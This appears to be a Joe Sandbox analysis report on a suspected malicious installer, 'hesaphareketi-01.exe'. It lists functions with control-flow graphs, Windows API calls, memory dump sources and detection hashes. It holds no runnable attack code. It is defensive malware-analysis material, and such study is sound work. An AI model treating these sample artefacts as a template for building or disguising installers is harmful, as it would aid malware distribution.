                                                                                      control_flow_graph 829 4052e6-4052fb 830 405301-405312 829->830 831 4053b2-4053b6 829->831 832 405314-405318 call 4062a4 830->832 833 40531d-405329 lstrlenW 830->833 832->833 835 405346-40534a 833->835 836 40532b-40533b lstrlenW 833->836 837 405359-40535d 835->837 838 40534c-405353 SetWindowTextW 835->838 836->831 839 40533d-405341 lstrcatW 836->839 840 4053a3-4053a5 837->840 841 40535f-4053a1 SendMessageW * 3 837->841 838->837 839->835 840->831 842 4053a7-4053aa 840->842 841->840 842->831
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                      • lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,0040325E), ref: 00405341
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 00405353
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll
                                                                                      • API String ID: 2531174081-3666791398
                                                                                      • Opcode ID: 1a26142181a7b7966a479fe8b98f583e8404c83a3c6630b706bedea1a7a6ef4c
                                                                                      • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                                                      • Opcode Fuzzy Hash: 1a26142181a7b7966a479fe8b98f583e8404c83a3c6630b706bedea1a7a6ef4c
                                                                                      • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004030FA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 843 4030fa-403111 844 403113 843->844 845 40311a-403123 843->845 844->845 846 403125 845->846 847 40312c-403131 845->847 846->847 848 403141-40314e call 403315 847->848 849 403133-40313c call 40332b 847->849 853 403303 848->853 854 403154-403158 848->854 849->848 855 403305-403306 853->855 856 4032ae-4032b0 854->856 857 40315e-4031a7 GetTickCount 854->857 858 40330e-403312 855->858 861 4032f0-4032f3 856->861 862 4032b2-4032b5 856->862 859 40330b 857->859 860 4031ad-4031b5 857->860 859->858 864 4031b7 860->864 865 4031ba-4031c8 call 403315 860->865 866 4032f5 861->866 867 4032f8-403301 call 403315 861->867 862->859 863 4032b7 862->863 868 4032ba-4032c0 863->868 864->865 865->853 877 4031ce-4031d7 865->877 866->867 867->853 875 403308 867->875 871 4032c2 868->871 872 4032c4-4032d2 call 403315 868->872 871->872 872->853 880 4032d4-4032e0 call 405e26 872->880 875->859 879 4031dd-4031fd call 4067bd 877->879 885 403203-403216 GetTickCount 879->885 886 4032a6-4032a8 879->886 887 4032e2-4032ec 880->887 888 4032aa-4032ac 880->888 889 403261-403263 885->889 890 403218-403220 885->890 886->855 887->868 893 4032ee 887->893 888->855 891 403265-403269 889->891 892 40329a-40329e 889->892 894 403222-403226 890->894 895 403228-403259 MulDiv wsprintfW call 4052e6 890->895 896 403280-40328b 891->896 897 40326b-403272 call 405e26 891->897 892->860 898 4032a4 892->898 893->859 894->889 894->895 900 40325e 895->900 902 40328e-403292 896->902 903 403277-403279 897->903 898->859 900->889 902->879 904 403298 902->904 903->888 905 40327b-40327e 903->905 904->859 905->902
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ... %d%%$FrA$@
                                                                                      • API String ID: 551687249-1685835555
                                                                                      • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                                      • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                                                      • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                                      • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 906 4065ec-40660c GetSystemDirectoryW 907 406610-406612 906->907 908 40660e 906->908 909 406623-406625 907->909 910 406614-40661d 907->910 908->907 912 406626-406659 wsprintfW LoadLibraryExW 909->912 910->909 911 40661f-406621 910->911 911->912
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                      • wsprintfW.USER32 ref: 0040663E
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                      • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                      • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 913 4057b5-405800 CreateDirectoryW 914 405802-405804 913->914 915 405806-405813 GetLastError 913->915 916 40582d-40582f 914->916 915->916 917 405815-405829 SetFileSecurityW 915->917 917->914 918 40582b GetLastError 917->918 918->916
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                      • GetLastError.KERNEL32 ref: 0040580C
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                                                      • GetLastError.KERNEL32 ref: 0040582B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 3449924974-3443045126
                                                                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                      • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                      • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 919 405da3-405daf 920 405db0-405de4 GetTickCount GetTempFileNameW 919->920 921 405df3-405df5 920->921 922 405de6-405de8 920->922 924 405ded-405df0 921->924 922->920 923 405dea 922->923 923->924
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405DC1
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\hesaphareketi-01.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF), ref: 00405DDC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-914839935
                                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                      • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                      • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 925 10001759-10001795 call 10001b18 929 100018a6-100018a8 925->929 930 1000179b-1000179f 925->930 931 100017a1-100017a7 call 10002286 930->931 932 100017a8-100017b5 call 100022d0 930->932 931->932 937 100017e5-100017ec 932->937 938 100017b7-100017bc 932->938 939 1000180c-10001810 937->939 940 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 937->940 941 100017d7-100017da 938->941 942 100017be-100017bf 938->942 943 10001812-1000184c call 100015b4 call 100024a4 939->943 944 1000184e-10001854 call 100024a4 939->944 966 10001855-10001859 940->966 941->937 945 100017dc-100017dd call 10002b57 941->945 947 100017c1-100017c2 942->947 948 100017c7-100017c8 call 1000289c 942->948 943->966 944->966 960 100017e2 945->960 949 100017c4-100017c5 947->949 950 100017cf-100017d5 call 10002640 947->950 957 100017cd 948->957 949->937 949->948 965 100017e4 950->965 957->960 960->965 965->937 969 10001896-1000189d 966->969 970 1000185b-10001869 call 10002467 966->970 969->929 972 1000189f-100018a0 GlobalFree 969->972 975 10001881-10001888 970->975 976 1000186b-1000186e 970->976 972->929 975->969 978 1000188a-10001895 call 1000153d 975->978 976->975 977 10001870-10001878 976->977 977->975 979 1000187a-1000187b FreeLibrary 977->979 978->969 979->975
                                                                                      APIs
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                        • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1791698881-3916222277
                                                                                      • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                      • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                      • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                      • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402003 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 982 402003-40200a 983 402014-402016 982->983 984 40200c-402012 call 4061c9 982->984 985 402024 983->985 986 402018-402023 call 4061c9 983->986 984->983 989 402026 985->989 990 40202e-402038 985->990 986->985 989->990 993 4020f7-4020f9 990->993 994 40203e-402054 call 402c37 * 2 990->994 995 402245-40224a call 401423 993->995 1005 402064-402073 LoadLibraryExW 994->1005 1006 402056-402062 GetModuleHandleW 994->1006 1002 402885-40288c 995->1002 1003 402abf-402ace 995->1003 1002->1003 1008 402075-402084 call 4066cb 1005->1008 1009 4020f0-4020f2 1005->1009 1006->1005 1006->1008 1012 402086-40208c 1008->1012 1013 4020bf-4020c4 call 4052e6 1008->1013 1009->995 1014 4020a5-4020bd call 10001759 1012->1014 1015 40208e-40209a call 401423 1012->1015 1018 4020c9-4020cc 1013->1018 1014->1018 1015->1018 1026 40209c-4020a3 1015->1026 1018->1003 1021 4020d2-4020dc call 403930 1018->1021 1021->1003 1025 4020e2-4020eb FreeLibrary 1021->1025 1025->1003 1026->1018
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: E
                                                                                      • API String ID: 2111968516-3568589458
                                                                                      • Opcode ID: f38303699a4018cbe8e6d667181d2715b25c4e985f0fcc16873fdce1186ac8ed
                                                                                      • Instruction ID: ab86da7c5213a9fcb696458d760f743eb2d5a3f98e1a27f5bdcb1ceb928109e6
                                                                                      • Opcode Fuzzy Hash: f38303699a4018cbe8e6d667181d2715b25c4e985f0fcc16873fdce1186ac8ed
                                                                                      • Instruction Fuzzy Hash: F331C430904208EBCF216FA1CE4999E7AB1AF01358F24413BF611B61E1DBBD4956DA6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                                      • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                                                      • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                                      • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj313A.tmp
                                                                                      • API String ID: 2655323295-3203284636
                                                                                      • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                                                      • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                                                      • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                                                      • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                      Memory Dump Source
